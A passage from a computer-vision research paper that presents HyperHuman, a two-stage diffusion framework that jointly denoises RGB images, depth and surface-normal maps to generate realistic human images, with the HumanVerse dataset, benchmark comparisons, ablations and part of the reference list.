an iterative denoising process (Ho et al., 2020), exemplar works like Stable Diffusion (Rombach et al., 2022) and DALL-E 2 (Ramesh et al., 2022) demonstrate unprecedented quality. Despite this, they mostly fail to create high-fidelity humans. One main reason is that existing models lack inherent structural awareness for human, making them even struggle to generate human of reasonable anatomy, e.g., correct number of arms and legs. To this end, our proposed approach explicitly models human structures within the latent space of diffusion model. ### Controllable Human Image Generation Traditional approaches for controllable human generation can be categorized into GAN-based (Zhu et al., 2017; Siarohin et al., 2019) and VAE-based (Ren et al., 2020; Yang et al., 2021), where the reference image and conditions are taken as input. To facilitate user-friendly applications, recent studies explore text prompts as generation guidance (Roy et al., 2022; Jiang et al., 2022), yet are confined to simple pose or style descriptions. The most relevant works that enable open-vocabulary pose-guided controllable human synthesis are ControlNet (Zhang & Agrawala, 2023), T2I-Adapter (Mou et al., 2023), and HumanSD (Ju et al., 2023b). However, they either suffer from inadequate pose control, or are confined to artistic styles of limited diversity. Besides, most previous studies merely take pose as input, while ignoring the multi-level correlations between human appearance and different types of structural information. 
In this work, we propose to incorporate structural awareness from coarse-level skeleton to fine-grained depth and surface-normal by joint denoising with expert branch, thus simultaneously capturing both the explicit appearance and latent structure in a unified framework for realistic human image synthesis. Figure 2: Overview of HyperHuman Framework. In Latent Structural Diffusion Model (purple), the image $x$, depth $d$, and surface-normal $n$ are jointly denoised conditioning on caption $c$ and pose skeleton $p$. For the notation simplicity, we denote pixel-/latent-space targets with the same variable. In Structure-Guided Refiner (blue), we compose the predicted conditions for higher-resolution generation. Note that the grey images refer to randomly dropout conditions for more robust training. Datasets for Human Image Generation. Large datasets are crucial for image generation. Existing human-centric collections are mainly confronted with following drawbacks: 1) Low-resolution of poor quality. For example, Market-1501 (Zheng et al., 2015) contains noisy pedestrian images of resolution $128 \times 64$, and VITON (Han et al., 2018) has human-clothing pairs of $256 \times 192$, which are inadequate for training high-definition models. 2) Limited diversity of certain domain. For example, SHHQ (Fu et al., 2022) is mostly composed of full-body humans with clean background, and DeepFashion (Liu et al., 2016) focuses on fashion images of little pose variations. 3) Insufficient dataset scale, where LIP (Gong et al., 2017) and Human-Art (Ju et al., 2023a) only contain 50K samples. Furthermore, none of the existing datasets contain rich annotations, which typically label a singular aspect of images. In this work, we take a step further by curating in-the-wild HumanVerse dataset with comprehensive annotations like human pose, depth map, and surface-normal map. 3 Our Approach We present HyperHuman that generates in-the-wild human images of high realism and diverse layouts. The overall framework is illustrated in Fig. 2. To make the content self-contained and narration clearer, we first introduce some pre-requisites of diffusion models and the problem setting in Sec. 3.1. Then, we present the Latent Structural Diffusion Model which simultaneously denoises the depth, surface-normal along with the RGB image. The explicit appearance and latent structure are thus jointly learned in a unified model (Sec. 3.2). Finally, we elaborate the Structure-Guided Refiner to compose the predicted conditions for detailed generation of higher resolution in Sec. 3.3. 3.1 Preliminaries and Problem Setting Diffusion Probabilistic Models define a forward diffusion process to gradually convert the sample $x$ from a real data distribution $p_{\text{data}}(x)$ into a noisy version, and learn the reverse generation process in an iterative denoising manner (Sohl-Dickstein et al., 2015; Song et al., 2020b). During the sampling stage, the model can transform Gaussian noise of normal distribution to real samples step-by-step. 
The denoising network $\epsilon_\theta(\cdot)$ estimates the additive Gaussian noise, which is typically structured as a UNet (Ronneberger et al., 2015) to minimize the ensemble of mean-squared error (Ho et al., 2020): $$\min_\theta \mathbb{E}_{x,c,\epsilon,t} \left[ w_t || \epsilon_\theta(\alpha_t x + \sigma_t \epsilon; c) - \epsilon ||_2^2 \right],$$ where $x, c \sim p_{\text{data}}$ are the sample-condition pairs from the training distribution; $\epsilon \sim \mathcal{N}(0, I)$ is the ground-truth noise; $t \sim \mathcal{U}[1, T]$ is the time-step and $T$ is the training step number; $\alpha_t$, $\sigma_t$, and $w_t$ are the terms that control the noise schedule and sample quality decided by the diffusion sampler. Latent Diffusion Model & Stable Diffusion. The widely-used latent diffusion model (LDM), with its improved version Stable Diffusion (Rombach et al., 2022), performs the denoising process in a separate latent space to reduce the computational cost. Specifically, a pre-trained VAE (Esser et al., 2021) first encodes the image $x$ to latent embedding $z = E(x)$ for DM training. At the inference stage, we can reconstruct the generated image through the decoder $\hat{x} = D(\hat{z})$. Such design enables the SD to scale up to broader datasets and larger model size, advancing from the SD 1.x & 2.x series to SDXL of heavier backbone on higher resolution (Podell et al., 2023). In this work, we extend SD 2.0 to Latent Structural Diffusion Model for efficient capturing of explicit appearance and latent structure, while the Structure-Guided Refiner is built on SDXL 1.0 for more pleasing visual quality. **Problem Setting for Controllable Human Generation.** Given a collection of $N$ human images $x$ with their captions $c$, we annotate the depth $d$, surface-normal $n$, and pose skeleton $p$ for each sample (details elaborated in Sec. 4). The training dataset can be denoted as $\{x_i, c_i, d_i, n_i, p_i\}_{i=1}^N$. In the first-stage Latent Structural Diffusion Model $G_1$, we estimate the RGB image $\hat{x}$, depth $\hat{d}$, and surface-normal $\hat{n}$ conditioned on the caption $c$ and skeleton $p$. In the second-stage Structure-Guided Refiner $G_2$, the predicted structures of $\hat{d}$ and $\hat{n}$ further serve as guidance for the generation of higher-resolution results $\hat{x}_{\text{high-res}}$. The training setting for our pipeline can be formulated as: $$\hat{x}, \hat{d}, \hat{n} = G_1(c, p), \quad \hat{x}_{\text{high-res}} = G_2(c, p, \hat{d}, \hat{n}).$$ During inference, only the text prompt and body skeleton are needed to synthesize well-aligned RGB image, depth, and surface-normal. Note that the users are free to substitute their own depth and surface-normal conditions to $G_2$ if applicable, enabling more flexible and controllable generation. ### 3.2 Latent Structural Diffusion Model To incorporate the body skeletons for pose control, the simplest way is by feature residual (Mou et al., 2023) or input concatenation (Ju et al., 2023b). However, three problems remain: **1)** The sparse keypoints only depict the coarse human structure, while the fine-grained geometry and foreground-background relationship are ignored. Besides, the naive DM training is merely supervised by RGB signals, which fails to capture the inherent structural information. **2)** The image RGB and structure representations are spatially aligned but substantially different in latent space. How to jointly model them remains challenging. 
**3)** In contrast to the colorful RGB images, the structure maps are mostly monotonous, with similar values in local regions, which makes them hard to learn for DMs (Lin et al., 2023).

**Unified Model for Simultaneous Denoising.** Our solution to the first problem is to simultaneously denoise the depth and surface-normal along with the synthesized RGB image. We choose them as additional learning targets for two reasons: **1)** Depth and normal can be easily annotated for large-scale datasets, and they are also used in recent controllable T2I generation (Zhang & Agrawala, 2023). **2)** As two commonly-used structural guidance signals, they complement the spatial relationship and geometry information, where the depth (Deng et al., 2022), normal (Wang et al., 2022), or both (Yu et al., 2022b) are proven beneficial in recent 3D studies. To this end, a naive method is to train three separate networks to denoise the RGB, depth, and normal individually, but the spatial alignment between them is then hard to preserve. Therefore, we propose to capture the joint distribution in a unified model by simultaneous denoising, which can be trained with the simplified objective (Ho et al., 2020):

$$L_{\text{pred}} = \mathbb{E}_{x,d,n,c,p,\epsilon,t} \left[ \|\hat{\epsilon}_\theta(x_{t_x}; c, p) - \epsilon_x\|_2^2 + \|\hat{\epsilon}_\theta(d_{t_d}; c, p) - \epsilon_d\|_2^2 + \|\hat{\epsilon}_\theta(n_{t_n}; c, p) - \epsilon_n\|_2^2 \right], \tag{3}$$

where $\epsilon_x$, $\epsilon_d$, and $\epsilon_n \sim \mathcal{N}(0, I)$ are three independently sampled Gaussian noises (shortened as $\epsilon$ in the expectation for conciseness) for the RGB, depth, and normal, respectively; $x_{t_x} = \alpha_{t_x} x + \sigma_{t_x} \epsilon_x$, $d_{t_d} = \alpha_{t_d} d + \sigma_{t_d} \epsilon_d$, and $n_{t_n} = \alpha_{t_n} n + \sigma_{t_n} \epsilon_n$ are the noised feature maps of the three learning targets; $t_x$, $t_d$, and $t_n \sim \mathcal{U}[1, T]$ are the sampled time-steps that control the scale of the added Gaussian noise (a sketch of this objective is given below).

**Structural Expert Branches with Shared Backbone.** The diffusion UNet contains down-sample, middle, and up-sample blocks, which are interleaved with convolution and self-/cross-attention layers. In particular, the DownBlocks compress the input noisy latent to hidden states of lower resolution, while the UpBlocks conversely upscale intermediate features to the predicted noise. Therefore, the most intuitive manner is to replicate the first several DownBlocks and the last several UpBlocks for each expert branch, as they are the layers nearest to the input and output. In this way, each expert branch gradually maps input noisy latents of different domains (i.e., $x_{t_x}$, $d_{t_d}$, and $n_{t_n}$) to a similar distribution for feature fusion. Then, after a series of shared modules, the same feature is distributed to each expert branch to output the noises (i.e., $\epsilon_x$, $\epsilon_d$, and $\epsilon_n$) for spatially-aligned results.

Furthermore, we find that the number of shared modules trades off between spatial alignment and distribution learning: On the one hand, more shared layers make the final outputs' features more similar, leading to paired texture and structure corresponding to the same image. On the other hand, the RGB, depth, and normal can be treated as different views of the same image, where predicting them from the same feature resembles an image-to-image translation task in essence.
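As a concrete illustration of the objective (3), the following is a minimal PyTorch-style sketch. Here `model` is a stand-in for the shared UNet with expert branches, and the schedule tensors `alphas`/`sigmas` are assumptions; note that the noise-schedule discussion below replaces the per-target time-steps with a shared $t$ and a v-prediction target.

```python
import torch
import torch.nn.functional as F

def joint_denoise_loss(model, x, d, n, c, p, alphas, sigmas, T=1000):
    """Simultaneous-denoising objective of Eq. (3), sketched.

    model(x_t, d_t, n_t, c, p, t_x, t_d, t_n) -> (eps_x_hat, eps_d_hat, eps_n_hat)
    stands in for the shared UNet with structural expert branches;
    alphas/sigmas are 1-D schedule tensors indexed by time-step.
    """
    b = x.size(0)
    noised, ts = [], []
    for target in (x, d, n):
        t = torch.randint(0, T, (b,), device=x.device)  # independent t per target (Eq. 3)
        a = alphas[t].view(b, 1, 1, 1)
        s = sigmas[t].view(b, 1, 1, 1)
        eps = torch.randn_like(target)                  # independent Gaussian noise
        noised.append((a * target + s * eps, eps))
        ts.append(t)
    (x_t, eps_x), (d_t, eps_d), (n_t, eps_n) = noised
    preds = model(x_t, d_t, n_t, c, p, *ts)
    # Sum of the three mean-squared noise-prediction errors.
    return sum(F.mse_loss(pred, eps)
               for pred, eps in zip(preds, (eps_x, eps_d, eps_n)))
```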
Empirically, we find the optimal design is to replicate the *conv_in*, the first *DownBlock*, the last *UpBlock*, and the *conv_out* for each expert branch, where each branch's skip-connections are maintained separately (as depicted in Fig. 2). This yields both the spatial alignment and the joint capture of image texture and structure. Note that such a design is not limited to three targets, but can generalize to an arbitrary number of paired distributions by simply involving more branches with little computation overhead.

**Noise Schedule for Joint Learning.** A problem arises when we inspect the distribution of depth and surface-normal: after being annotated by off-the-shelf estimators, they are regularized to a certain data range with similar values in local regions, e.g., $[0, 1]$ for depth and unit vectors for surface-normal. Such monotonous images may leak low-frequency signals like the mean of each channel during training. Besides, their latent distributions diverge from that of the RGB space, making it hard to exploit common noise schedules (Lin et al., 2023) and the diffusion prior. Motivated by this, we first normalize the depth and normal latent features to a distribution similar to the RGB latent, so that the pre-trained denoising knowledge can be adaptively reused. The zero terminal SNR ($\alpha_T = 0, \sigma_T = 1$) is further enforced to eliminate the structure maps' low-frequency information.

Another question is how to sample the time-step $t$ for each branch. An alternative is to perturb the data of different modalities with different levels (Bao et al., 2023), which samples a different $t$ for each target as in Eq. 3. However, as we aim to jointly model RGB, depth, and normal, such a strategy gives only $10^{-9}$ probability to sample each perturbation situation (given the total steps $T = 1000$), which is too sparse to obtain good results. In contrast, we propose to densely sample the same time-step $t$ for all the targets, so that the sampling sparsity and learning difficulty do not increase even when we learn more modalities. With the same noise level for each structural expert branch, the intermediate features follow similar distributions when they fuse in the shared backbone and can better complement each other. Finally, we utilize the v-prediction (Salimans & Ho, 2022) learning target as the network objective:

$$L_{v\text{-pred}} = \mathbb{E}_{x,d,n,c,p,v,t} \left[ \|\hat{v}_\theta(x_t; c, p) - v_x^*\|_2^2 + \|\hat{v}_\theta(d_t; c, p) - v_d^*\|_2^2 + \|\hat{v}_\theta(n_t; c, p) - v_n^*\|_2^2 \right], \tag{4}$$

where $v_x^* = \alpha_t \epsilon_x - \sigma_t x$, $v_d^* = \alpha_t \epsilon_d - \sigma_t d$, and $v_n^* = \alpha_t \epsilon_n - \sigma_t n$ are the v-prediction learning targets at time-step $t$ for the RGB, depth, and normal, respectively. Overall, the unified simultaneous denoising network $\hat{v}_\theta$ with the structural expert branches, accompanied by the improved noise schedule and time-step sampling strategy, gives the first-stage Latent Structural Diffusion Model $G_1$.

### 3.3 Structure-Guided Refiner

**Compose Structures for Controllable Generation.** With the unified latent structural diffusion model, spatially-aligned conditions of depth and surface-normal can be predicted. We then learn a refiner network to render a high-quality image $\hat{x}^{\text{high-res}}$ by composing the multi-conditions of caption $c$, pose skeleton $p$, the predicted depth $\hat{d}$, and the predicted surface-normal $\hat{n}$. In contrast to Zhang & Agrawala (2023) and Mou et al.
(2023), which can only handle a singular condition per run, we propose to unify multiple control signals at the training phase. Specifically, we first project each condition from the input image size (e.g., $1024 \times 1024$) to a feature map that matches the latent size of SDXL (e.g., $128 \times 128$). Each condition is encoded via a light-weight embedder of four stacked convolutional layers with $4 \times 4$ kernels, $2 \times 2$ strides, and ReLU activation. Next, the embeddings from each branch are summed up coordinate-wise and fed into the trainable copy of the SDXL Encoder Blocks. Since involving more conditions only incurs the negligible computational overhead of a tiny encoder network, our method can be trivially extended to new structural conditions. Although a recent work also incorporates multiple conditions in one model (Huang et al., 2023), it has to re-train the whole backbone, making the training cost unaffordable when scaling up to high resolution.

**Random Dropout for Robust Conditioning.** Since the predicted depth and surface-normal conditions from $G_1$ may contain artifacts, a potential issue of such a two-stage pipeline is error accumulation, which typically leads to a train-test performance gap. To solve this problem, we propose to drop out structural maps for robust conditioning. In particular, we randomly mask out any of the control signals, e.g., replace the text prompt with an empty string, or substitute the structural maps with zero-value images. In this way, the model does not solely rely on a single guidance for synthesis, thus balancing the impact of each condition robustly. To sum up, the structure-composing refiner network with the robust conditioning scheme constitutes the second-stage Structure-Guided Refiner $G_2$ (a sketch of this conditioning scheme is given below).

### 4 HumanVerse Dataset

Large-scale datasets with high-quality samples, rich annotations, and diverse distribution are crucial for image generation tasks (Schuhmann et al., 2022; Podell et al., 2023), especially in the human domain (Liu et al., 2016; Fu et al., 2022). To facilitate controllable human generation of high fidelity, we establish a comprehensive human dataset with extensive annotations named HumanVerse. Please kindly refer to Appendix A.17 for more details about the dataset and the annotation resources we use.

**Dataset Preprocessing.** We curate from two principled datasets: LAION-2B-en (Schuhmann et al., 2022) and COYO-700M (Byeon et al., 2022). To isolate human images, we employ YOLOS (Fang et al., 2021) for human detection. Specifically, only those images containing 1 to 3 human bounding boxes are retained, where people should be visible with an area ratio exceeding 15%. We further rule out samples of poor aesthetics (< 4.5) or low resolution (< 200 × 200). This yields a high-quality subset by eliminating blurry and over-small humans. Unlike existing models that mostly train on full-body humans in simple contexts (Zhang & Agrawala, 2023), our dataset encompasses a wider spectrum, including various backgrounds and partial human regions such as clothing and limbs.

**2D Human Poses.** 2D human poses (skeletons of joints), which serve as one of the most flexible and most easily obtainable coarse-level condition signals, are widely used in controllable human generation studies (Ju et al., 2023b; Zhu et al., 2023; Yu et al., 2023; Liu et al., 2023; 2022a;b;c).
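Stepping back to the refiner of §3.3 for a moment, here is the promised minimal PyTorch sketch of the condition embedding with random dropout. The paper describes four stacked 4×4 convs with stride 2, but four stride-2 stages would map 1024 to 64 rather than SDXL's 128×128 latent size, so this sketch uses three stride-2 stages plus a stride-1 conv; the channel widths and dropout rate are likewise our assumptions.

```python
import torch
import torch.nn as nn

class ConditionEmbedder(nn.Module):
    """Light-weight per-condition embedder sketched after Sec. 3.3."""
    def __init__(self, in_ch=3, widths=(16, 32, 96), out_ch=320):
        super().__init__()
        layers, prev = [], in_ch
        for w in widths:                                   # 1024 -> 512 -> 256 -> 128
            layers += [nn.Conv2d(prev, w, 4, stride=2, padding=1), nn.ReLU()]
            prev = w
        layers += [nn.Conv2d(prev, out_ch, 3, stride=1, padding=1)]
        self.net = nn.Sequential(*layers)

    def forward(self, cond):                               # (B, in_ch, 1024, 1024)
        return self.net(cond)                              # (B, out_ch, 128, 128)


def embed_conditions(embedders, conds, drop_p=0.1, training=True):
    """Sum per-condition embeddings coordinate-wise; during training, randomly
    zero out whole condition maps (robust conditioning). drop_p is a guess."""
    total = 0.0
    for emb, c in zip(embedders, conds):
        if training:
            keep = (torch.rand(c.size(0), 1, 1, 1, device=c.device) > drop_p).float()
            c = c * keep                                   # dropped maps become zero images
        total = total + emb(c)
    return total                                           # fed into the SDXL encoder copy
```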
To achieve accurate keypoint annotations, we resort to MMPose (Contributors, 2020) as inference interface and choose ViTPose-H (Xu et al., 2022) as backbone that performs best over several pose estimation benchmarks. In particular, the per-instance bounding box, keypoint coordinates and confidence are labeled, including whole-body skeleton, body skeleton, hand, and facial landmarks. Depth and Surface-Normal Maps are fine-grained structures that reflect the spatial geometry of images (Wu et al., 2022), which are commonly used in conditional generation (Mou et al., 2023). We apply Omnidata (Eftekhari et al., 2021) for monocular depth and normal. The MiDaS (Ranftl et al., 2022) is further annotated following recent depth-to-image pipelines (Rombach et al., 2022). Outpaint for Accurate Annotations. Diffusion models have shown promising results on image inpainting and outpainting, where the appearance and structure of unseen regions can be hallucinated based on the visible parts. Motivated by this, we propose to outpaint each image for a more holistic view given that most off-the-shelf structure estimators are trained on the “complete” image views. Although the outpainted region may be imperfect with artifacts, it can complement a more comprehensive human structure. To this end, we utilize the powerful SD-Inpaint to outpaint the surrounding areas of the original canvas. These images are further processed by off-the-shelf estimators, where we only use the labeling within the original image region for more accurate annotations. Overall Statistics. In summary, COYO subset contains 90,948,474 (91M) images and LAION-2B subset contains 248,396,109 (248M) images, which is 18.12% and 20.77% of fullset, respectively. The whole annotation process takes 640 16/32G NVIDIA V100 GPUs for two weeks in parallel. 5 EXPERIMENTS Experimental Settings. For the comprehensive evaluation, we divide our comparisons into two settings: 1) Quantitative analysis. All the methods are tested on the same benchmark, using the same prompt with DDIM Scheduler (Song et al., 2020a) for 50 denoising steps to generate the same resolution images of $512 \times 512$. 2) Qualitative analysis. We generate high-resolution $1024 \times 1024$ results for each model with the officially provided best configurations, such as the prompt engineering, noise scheduler, and classifier-free guidance (CFG) scale. Note that we use the RGB output of the first-stage Latent Structural Diffusion Model for numerical comparison, while the improved results from the second-stage Structure-Guided Refiner are merely utilized for visual comparison. Datasets. We follow common practices in T2I generation (Yu et al., 2022a) and filter out a human subset from MS-COCO 2014 validation (Lin et al., 2014) for zero-shot evaluation. In particular, off-the-shelf human detector and pose estimator are used to obtain 8,236 images with clearly-visible humans for evaluation. All the ground truth images are resized and center-cropped to $512 \times 512$. To guarantee fair comparisons, we train first-stage Latent Structural Diffusion on HumanVerse, which is a subset of public LAION-2B and COYO, to report quantitative metrics. In addition, an internal dataset is adopted to train second-stage Structure-Guided Refiner only for visually pleasing results. Table 1: Zero-Shot Evaluation on MS-COCO 2014 Validation Human. 
We compare our model with recent SOTA general T2I models (Rombach et al., 2022; Podell et al., 2023; DeepFloyd, 2023) and controllable methods (Zhang & Agrawala, 2023; Mou et al., 2023; Ju et al., 2023b). Note that SDXL generates artistic style in 512, and IF only creates fixed-size images, we first generate $1024 \times 1024$ results, then resize back to $512 \times 512$ for these two methods. We bold the best and underline the second results for clarity. Our improvements over the second method are shown in red. | Methods | Image Quality | Alignment | Pose Accuracy | |------------------|---------------|-----------|---------------| | | FID ↓ | KID × 1k ↓ | FID_{CLIP} ↓ | CLIP ↑ | AP ↑ | AR ↑ | AP_{clean} ↑ | AR_{clean} ↑ | | SD 1.5 | 24.26 | 8.69 | 12.93 | 31.72 | - | - | - | - | | SD 2.0 | 22.98 | 9.45 | 11.41 | 32.13 | - | - | - | - | | SD 2.1 | 24.63 | 9.52 | 15.01 | 32.11 | - | - | - | - | | SDXL† | 29.08 | 12.16 | 19.00 | 32.90 | - | - | - | - | | DeepFloyd-IF‡ | 29.72 | 15.27 | 17.01 | 32.11 | - | - | - | - | | ControlNet | 27.16 | 10.29 | 15.59 | 31.60 | 20.46| 30.23| 25.92 | 38.67 | | T2I-Adapter | 23.54 | 7.98 | 11.95 | 32.16 | 27.54| 36.62| 34.86 | 46.53 | | HumanSD | 52.49 | 33.96 | 21.11 | 29.48 | 26.71| 36.85| 32.84 | 45.87 | | HyperHuman | **17.18** | **4.11** | **7.82** | **32.17**| **30.38**| **37.84**| **38.84**| **48.70**| Comparison Methods. We compare with two categories of open-source SOTA works: 1) General T2I models, including SD (Rombach et al., 2022) (SD 1.x & 2.x), SDXL (Podell et al., 2023), and IF (DeepFloyd, 2023). 2) Controllable methods with pose condition. Notably, ControlNet (Zhang & Agrawala, 2023) and T2I-Adapter (Mou et al., 2023) can handle multiple structural signals like canny, depth, and normal, where we take their skeleton-conditioned variant for comparison. HumanSD (Ju et al., 2023b) is the most recent work that specializes in pose-guided human generation. Implementation Details. We resize and random-crop the RGB, depth, and normal to the target resolution of each stage. To enforce the model with size and location awareness, the original image height/width and crop coordinates are embedded in a similar way to time embedding (Podell et al., 2023). Our code is developed based on diffusers (von Platen et al., 2022). 1) For the Latent Structural Diffusion, we fine-tune the whole UNet from the pretrained SD-2.0-base to v-prediction (Salimans & Ho, 2022) in $512 \times 512$ resolution. The DDIMScheduler with improved noise schedule is used for both training and sampling. We train on 128 80G NVIDIA A100 GPUs in a batch size of 2,048 for one week. 2) For the Structure-Guided Refiner, we choose SDXL-1.0-base as the frozen backbone and fine-tune to ε-prediction for high-resolution synthesis of $1024 \times 1024$. We train on 256 80G NVIDIA A100 GPUs in a batch size of 2,048 for one week. The whole two-stage inference process takes 12 seconds on a single 40G NVIDIA A100 GPU. The overall framework is optimized with AdamW (Kingma & Ba, 2015) in $1e^{-5}$ learning rate, and 0.01 weight decay. 5.1 Main Results Evaluation Metrics. We adopt commonly-used metrics to make comprehensive comparisons from three perspectives: 1) Image Quality. FID, KID, and FID_{CLIP} are used to reflect quality and diversity. 2) Text-Image Alignment, where the CLIP similarity between text and image embeddings is reported. 3) Pose Accuracy. We use the state-of-the-art pose estimator to extract poses from synthetic images and compare with the input (GT) pose conditions. 
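As an aside on these metrics, one plausible way to compute the image-quality and alignment numbers with off-the-shelf tooling is sketched below using `torchmetrics`; this mirrors the evaluation protocol, not the authors' exact code. The pose-accuracy metrics continue after the sketch.

```python
import torch
from torchmetrics.image.fid import FrechetInceptionDistance
from torchmetrics.multimodal.clip_score import CLIPScore

@torch.no_grad()
def zero_shot_eval(gen_images, real_images, captions):
    """FID and CLIP similarity as in Table 1 (a sketch).

    gen_images/real_images: uint8 tensors of shape (N, 3, H, W);
    captions: list of N prompt strings.
    """
    fid = FrechetInceptionDistance(feature=2048)
    fid.update(real_images, real=True)
    fid.update(gen_images, real=False)
    clip = CLIPScore(model_name_or_path="openai/clip-vit-base-patch16")
    clip_val = clip(gen_images, captions)
    return fid.compute().item(), clip_val.item()
```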
For pose accuracy, the Average Precision (AP) and Average Recall (AR) are adopted to evaluate the pose alignment. Note that due to the noisy pose estimation of in-the-wild COCO, we also use AP$_{\text{clean}}$ and AR$_{\text{clean}}$ to evaluate only the three most salient persons.

**Quantitative Analysis.** We report zero-shot evaluation results in Tab. 1. For all methods, we use the default CFG scale of 7.5, which balances quality and diversity well, with appealing results. Thanks to the structural awareness from the expert branches, our proposed HyperHuman outperforms previous works by a clear margin, achieving the best results on the image quality and pose accuracy metrics and ranking second on CLIP score. Note that SDXL (Podell et al., 2023) uses two text encoders with a $3\times$ larger UNet containing more cross-attention layers, leading to superior text-image alignment. In spite of this, we still obtain an on-par CLIP score and surpass all the other baselines that have similar text encoder parameters. We also show the FID-CLIP and FID$_{\text{CLIP}}$-CLIP curves over multiple CFG scales in Fig. 3, where our model balances well between image quality and text alignment, especially for the commonly-used CFG scales (bottom right). Please see Sec. A.1 for more quantitative results.

Figure 3: Evaluation Curves on COCO-Val Human. We show FID-CLIP (left) and FID$_{\text{CLIP}}$-CLIP (right) curves with the CFG scale ranging from 4.0 to 20.0 for all methods.

Table 3: User Preference Comparisons. We report the ratio of users who prefer our model to the baselines.

| Methods | SD 2.1 | SDXL | IF | ControlNet | T2I-Adapter | HumanSD |
|------------------|--------|------|------|------------|-------------|---------|
| HyperHuman | 89.24% | 60.45% | 82.45% | 92.33% | 98.06% | 99.08% |

**Qualitative Analysis.** Fig. 1 shows results (top) and comparisons with baselines (bottom). We can generate both photo-realistic images and stylistic renderings, showing better realism, quality, diversity, and controllability. A comprehensive user study is further conducted, as shown in Tab. 3, where the users prefer HyperHuman to the general and controllable T2I models. Please refer to Appendix A.4, A.15, and A.16 for more user study details, comparisons, and qualitative results.

5.2 Ablation Study

In this section, we present the key ablation studies. In addition to the image quality metrics, we also use the depth/normal prediction error as a proxy for the spatial alignment between the synthesized RGB and structural maps. Specifically, we extract the depth and surface-normal with off-the-shelf estimators as pseudo ground truth. $L^d_2$ and $L^n_2$ denote the $L_2$-error of depth and normal, respectively.

**Simultaneous Denoise with Expert Branch.** We explore whether the latent structural diffusion model helps, and how many layers to replicate in the structural expert branches: 1) Denoise RGB, which only learns to denoise an image. 2) Denoise RGB + Depth, which also predicts depth. 3) Denoise RGB + Normal, which also predicts the surface-normal map. 4) Half DownBlock & UpBlock. We replicate half of the first DownBlock and the last UpBlock, which contains one down/up-sample ResBlock and one AttnBlock. 5) Two DownBlocks & UpBlocks, where we copy the first two DownBlocks and the last two UpBlocks. The results are shown in Tab. 2 (top), which prove that the joint learning of image appearance, spatial relationship, and geometry is beneficial. We also find that while fewer replicated layers give more spatially aligned results, the per-branch parameters are insufficient to capture the distributions of each modality.
In contrast, excessive replicated layers lead to less feature fusion across the different targets, so the branches fail to complement each other.

Noise Schedules. The ablation is conducted on two settings: 1) Default SNR with $\epsilon$-pred, where we use the original noise schedule with $\epsilon$-prediction. 2) Different Timesteps $t$, where we sample different noise levels ($t_x$, $t_d$, and $t_n$) for each modality. We can see from Tab. 2 (bottom) that zero-terminal SNR is important for learning the monotonous structural maps. Besides, sampling different timesteps per modality harms performance, due to sparser perturbation sampling and harder information sharing across branches.

6 Discussion

Conclusion. In this paper, we propose a novel framework, HyperHuman, to generate in-the-wild human images of high quality. To enforce the joint learning of image appearance, spatial relationship, and geometry in a unified network, we propose the Latent Structural Diffusion Model, which simultaneously denoises the depth and normal along with the RGB. We then devise the Structure-Guided Refiner to compose the predicted conditions for detailed generation. Extensive experiments demonstrate that our framework yields superior performance, generating realistic humans under diverse scenarios.

Limitation and Future Work. As an early attempt at a human generation foundation model, our approach creates controllable humans of high realism. However, due to the limited performance of existing pose/depth/normal estimators for in-the-wild humans, we find it sometimes fails to generate subtle details like fingers and eyes. Besides, the current pipeline still requires a body skeleton as input; deep priors like LLMs could be explored to achieve text-to-pose generation in future work.

7 Acknowledgement

This study is supported by the Ministry of Education, Singapore, under its MOE AcRF Tier 2 (MOE-T2EP20221-0012) and NTU NAP.

REFERENCES

Yogesh Balaji, Seungjun Nah, Xun Huang, Arash Vahdat, Jiaming Song, Karsten Kreis, Miika Aittala, Timo Aila, Samuli Laine, Bryan Catanzaro, et al. eDiff-I: Text-to-image diffusion models with an ensemble of expert denoisers. arXiv preprint arXiv:2211.01324, 2022.

Fan Bao, Shen Nie, Kaiwen Xue, Chongxuan Li, Shi Pu, Yaole Wang, Gang Yue, Yue Cao, Hang Su, and Jun Zhu. One transformer fits all distributions in multi-modal diffusion at scale. arXiv preprint arXiv:2303.06555, 2023.

Mikołaj Bińkowski, Danica J Sutherland, Michael Arbel, and Arthur Gretton. Demystifying MMD GANs. arXiv preprint arXiv:1801.01401, 2018.

Minwoo Byeon, Beomhee Park, Haecheon Kim, Sungjun Lee, Woonhyuk Baek, and Saehoon Kim. Coyo-700m: Image-text pair dataset. https://github.com/kakaobrain/coyo-dataset, 2022.

MMPose Contributors. Openmmlab pose estimation toolbox and benchmark. https://github.com/open-mmlab/mmpose, 2020.

DeepFloyd. Deepfloyd if. Github Repository, 2023. URL https://github.com/deep-floyd/IF.

Kangle Deng, Andrew Liu, Jun-Yan Zhu, and Deva Ramanan. Depth-supervised nerf: Fewer views and faster training for free. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 12882–12891, 2022.

Prafulla Dhariwal and Alexander Nichol. Diffusion models beat gans on image synthesis. Advances in Neural Information Processing Systems, 34:8780–8794, 2021.

Ainaz Eftekhari, Alexander Sax, Jitendra Malik, and Amir Zamir. Omnidata: A scalable pipeline for making multi-task mid-level vision datasets from 3d scans. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 10786–10796, 2021.
Patrick Esser, Robin Rombach, and Björn Ommer. Taming transformers for high-resolution image synthesis. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 12873–12883, 2021.

Yuxin Fang, Bencheng Liao, Xinggang Wang, Jiemin Fang, Jiyang Qi, Rui Wu, Jianwei Niu, and Wenyu Liu. You only look at one sequence: Rethinking transformer in vision through object detection. arXiv preprint arXiv:2106.00666, 2021.

Jianglin Fu, Shikai Li, Yuming Jiang, Kwan-Yee Lin, Chen Qian, Chen Change Loy, Wayne Wu, and Ziwei Liu. Stylegan-human: A data-centric odyssey of human generation. In European Conference on Computer Vision, pp. 1–19. Springer, 2022.

Ke Gong, Xiaodan Liang, Dongyu Zhang, Xiaohui Shen, and Liang Lin. Look into person: Self-supervised structure-sensitive learning and a new benchmark for human parsing. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 932–940, 2017.

Jiaxian Guo, Junnan Li, Dongxu Li, Anthony Tiong, Boyang Li, Dacheng Tao, and Steven Hoi. From images to textual prompts: Zero-shot VQA with frozen large language models, 2023. URL https://openreview.net/forum?id=CklUtNvukP8.

Xintong Han, Zuxuan Wu, Zhe Wu, Ruichi Yu, and Larry S Davis. Viton: An image-based virtual try-on network. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 7543–7552, 2018.
YNmnGzttMJ
